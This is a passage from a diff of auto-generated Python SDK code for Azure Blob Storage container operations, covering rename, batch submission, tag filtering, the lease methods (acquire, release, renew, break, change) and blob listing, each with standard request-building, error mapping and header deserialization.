"{url}/{containerName}"} # type: ignore + + + @distributed_trace + def rename( # pylint: disable=inconsistent-return-statements + self, + source_container_name, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + source_lease_id=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """Renames an existing container. + + :param source_container_name: Required. Specifies the name of the container to rename. + :type source_container_name: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param source_lease_id: A lease ID for the source path. If specified, the source path must have + an active lease and the lease ID must match. Default value is None. + :type source_lease_id: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "rename". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "rename") # type: str + + + request = build_rename_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + source_container_name=source_container_name, + timeout=timeout, + request_id_parameter=request_id_parameter, + source_lease_id=source_lease_id, + template_url=self.rename.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + rename.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def submit_batch( + self, + content_length, # type: int + body, # type: IO + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> IO + """The Batch operation allows multiple API calls to be embedded into a single HTTP request. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword multipart_content_type: Required. The value of this header must be multipart/mixed + with a batch boundary. Example header value: multipart/mixed; boundary=batch_:code:``. + :paramtype multipart_content_type: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "batch". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "batch") # type: str + + _content = self._serialize.body(body, 'IO') + + request = build_submit_batch_request( + url=self._config.url, + multipart_content_type=multipart_content_type, + restype=restype, + comp=comp, + version=self._config.version, + content=_content, + content_length=content_length, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.submit_batch.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + submit_batch.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def filter_blobs( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + where=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + **kwargs # type: Any + ): + # type: (...) -> "_models.FilterBlobSegment" + """The Filter Blobs operation enables callers to list blobs in a container whose tags match a + given search expression. Filter blobs searches within the given container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param where: Filters the results to return only to return only blobs whose tags match the + specified expression. Default value is None. + :type where: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "blobs". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: FilterBlobSegment, or the result of cls(response) + :rtype: ~azure.storage.blob.models.FilterBlobSegment + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.FilterBlobSegment"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "blobs") # type: str + + + request = build_filter_blobs_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + where=where, + marker=marker, + maxresults=maxresults, + template_url=self.filter_blobs.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('FilterBlobSegment', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + filter_blobs.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def acquire_lease( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + duration=None, # type: Optional[int] + proposed_lease_id=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param duration: Specifies the duration of the lease, in seconds, or negative one (-1) for a + lease that never expires. A non-infinite lease can be between 15 and 60 seconds. A lease + duration cannot be changed using renew or change. Default value is None. + :type duration: int + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. Default value is None. + :type proposed_lease_id: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "acquire". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "acquire") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_acquire_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + timeout=timeout, + duration=duration, + proposed_lease_id=proposed_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.acquire_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + acquire_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def release_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "release". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "release") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_release_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.release_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + release_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def renew_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "renew". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "renew") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_renew_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.renew_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + renew_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def break_lease( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + break_period=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param break_period: For a break operation, proposed duration the lease should continue before + it is broken, in seconds, between 0 and 60. This break period is only used if it is shorter + than the time remaining on the lease. If longer, the time remaining on the lease is used. A new + lease will not be available before the break period has expired, but the lease may be held for + longer than the break period. If this header does not appear with a break operation, a + fixed-duration lease breaks after the remaining lease period elapses, and an infinite lease + breaks immediately. Default value is None. + :type break_period: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "break". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "break") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_break_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + timeout=timeout, + break_period=break_period, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.break_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-time']=self._deserialize('int', response.headers.get('x-ms-lease-time')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + break_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def change_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + proposed_lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. + :type proposed_lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "change". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "change") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_change_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + proposed_lease_id=proposed_lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.change_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + change_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def list_blob_flat_segment( + self, + prefix=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + include=None, # type: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.ListBlobsFlatSegmentResponse" + """[Update] The List Blobs operation returns a list of the blobs under the specified container. + + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. + :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param include: Include this parameter to specify one or more datasets to include in the + response. Default value is None. + :type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem] + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "list". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListBlobsFlatSegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListBlobsFlatSegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListBlobsFlatSegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_blob_flat_segment_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_blob_flat_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('ListBlobsFlatSegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_blob_flat_segment.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def list_blob_hierarchy_segment( + self, + delimiter, # type: str + prefix=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + include=None, # type: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.ListBlobsHierarchySegmentResponse" + """[Update] The List Blobs operation returns a list of the blobs under the specified container. + + :param delimiter: When the request includes this parameter, the operation returns a BlobPrefix + element in the response body that acts as a placeholder for all blobs whose names begin with + the same substring up to the appearance of the delimiter character. The delimiter may be a + single character or a string. + :type delimiter: str + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. + :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for 